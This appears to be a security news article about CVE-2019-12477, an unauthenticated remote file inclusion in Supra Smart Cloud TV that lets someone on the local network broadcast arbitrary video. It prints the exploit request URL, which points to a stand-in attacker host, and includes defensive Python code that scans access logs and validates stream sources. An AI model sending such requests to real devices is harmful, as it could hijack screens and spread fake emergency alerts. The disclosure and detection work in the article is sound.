CVE-2019-12477: Vulnerability in Supra Smart Cloud TV

Security researcher Dhiraj Mishra just discovered a security vulnerability, CVE-2019-12477, in the SUPRA smart TV brand.

According to the report, Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which lets a local attacker broadcast fake video without any authentication by requesting /remote/media_control?action=setUri&uri=URI.
More about CVE-2019-12477

SUPRA is a Russian company that manufactures audio-video equipment, household appliances and car electronics. Most of the technology is being distributed through e-commerce websites based in Russia, China, and UAE.

In his report, the researcher shared that he successfully exploited `openLiveURL()`, which allows a local attacker to broadcast video on a Supra Smart Cloud TV. “I found this vulnerability initially by source code review, and then crawling the application and reading every request helped me to trigger this vulnerability,” Mishra said.


To trigger the vulnerability, an attacker would only have to send a specially crafted request to the following URL:

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

The URL above expects an .m3u8 (HLS playlist) video source, and the request can be sent with nothing more than `curl -v -X GET`. In other words, this is an unauthenticated remote file inclusion: an attacker could broadcast any video without authentication, and in the worst case could leverage the flaw to broadcast a fake emergency message (scary, right?).
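The article describes the flaw in terms of one request, so the following is an added example of what a defender can do with that description; it is not code from the article or from the researcher's report. It does two things: it shows the input check a hardened `setUri` handler would apply to the `uri` parameter (scheme, allow-listed host, .m3u8 path), and it runs that same check over HTTP access-log lines to flag requests that set the TV's stream source to an unexpected origin. The endpoint path and parameter names are the ones quoted above; the Common Log Format, the allow-list of stream hosts, and the sample log lines are constructed assumptions for the example.

```python
"""Flag setUri requests to /remote/media_control whose stream source violates a local policy.

Added example (not from the article or the researcher's report). The endpoint and the
action/uri parameters are as quoted in the article; the log format, the allow-list and
the sample lines below are assumptions constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines in Common Log Format. Client addresses, timestamps
# and stream hosts are invented; only the request path and parameters follow the article.
SAMPLE_LOG = """\
192.168.1.20 - - [03/Jun/2019:10:00:01 +0000] "GET /remote/media_control?action=getVolume HTTP/1.1" 200 -
192.168.1.20 - - [03/Jun/2019:10:00:05 +0000] "GET /remote/media_control?action=setUri&uri=http://192.168.1.10/live/channel.m3u8 HTTP/1.1" 200 -
192.168.1.77 - - [03/Jun/2019:10:00:09 +0000] "GET /remote/media_control?action=setUri&uri=http://attacker.example/fake_broadcast_message.m3u8 HTTP/1.1" 200 -
192.168.1.77 - - [03/Jun/2019:10:00:12 +0000] "GET /remote/media_control?action=setUri&uri=ftp://192.168.1.10/x.m3u8 HTTP/1.1" 200 -
"""

# Assumed policy: only these hosts may be used as the TV's live stream source.
ALLOWED_STREAM_HOSTS = {"192.168.1.10"}

# Common Log Format: client, ident, user, [timestamp], "METHOD target HTTP/x.y", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def uri_policy_violation(uri, allowed_hosts):
    """Return a reason string if `uri` must not be accepted as a stream source, else None.

    This is the validation a hardened setUri handler would apply before loading the
    playlist: restrict the scheme, require an allow-listed host, and require an .m3u8 path.
    """
    parsed = urlparse(uri)
    if parsed.scheme not in ("http", "https"):
        return f"scheme {parsed.scheme!r} not permitted"
    host = parsed.hostname
    if not host:
        return "no host in uri"
    if host not in allowed_hosts:
        return f"host {host!r} not in allow-list"
    if not parsed.path.lower().endswith(".m3u8"):
        return "path is not an .m3u8 playlist"
    return None


def find_seturi_requests(log_text, allowed_hosts=ALLOWED_STREAM_HOSTS):
    """Parse CLF lines and return one finding per setUri request, with its policy verdict."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        target = urlparse(m["target"])
        if target.path != "/remote/media_control":
            continue
        query = parse_qs(target.query)
        if query.get("action") != ["setUri"]:
            continue  # other media_control actions are not in scope here
        uri = query.get("uri", [""])[0]
        findings.append({
            "client": m["client"],
            "timestamp": m["ts"],
            "uri": uri,
            "violation": uri_policy_violation(uri, allowed_hosts),
        })
    return findings


def suspicious(findings):
    """Keep only the setUri requests that violate the stream-source policy."""
    return [f for f in findings if f["violation"]]


if __name__ == "__main__":
    for f in find_seturi_requests(SAMPLE_LOG):
        print(f"{f['timestamp']}  {f['client']}  {f['uri']}  ->  {f['violation'] or 'allowed'}")
```

Run stand-alone, it reports the two requests from 192.168.1.77 as violations (an off-LAN host and a non-HTTP scheme) and the request from 192.168.1.20 as allowed. The same `uri_policy_violation` check is what the device firmware lacks: because the endpoint performs neither authentication nor source validation, anyone who can reach the TV's web interface can point it at an arbitrary playlist.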

The problem here is that the vulnerability remains unpatched and it is highly likely it will stay this way. The researcher didn’t find any way to contact the vendor to report his findings. There’s also a proof-of-concept video revealing the successful exploitation. The video shows how a speech of Steve Jobs is suddenly replaced with an attacker’s fake “Emergency Alert Message”.

The vulnerability has been assigned a CVE ID, CVE-2019-12477, but there is no information on whether it will ever be addressed. So, what can owners of SUPRA Smart Cloud TVs do? The short answer is to keep the wireless network as secure as possible, using a strong password and a firewall for all smart devices. Because, as we are shown every day, smart homes are not that smart at all.


A great example of how easy it is to hack a smart home comes from Avast researchers. Last August, they warned about the MQTT protocol (Message Queuing Telemetry Transport) which, if misconfigured, could give hackers complete access to a smart home. As a result of this security loophole, the home could be manipulated in many ways, including its entertainment and voice systems, various household devices, and smart doors.


Milena Dimitrova
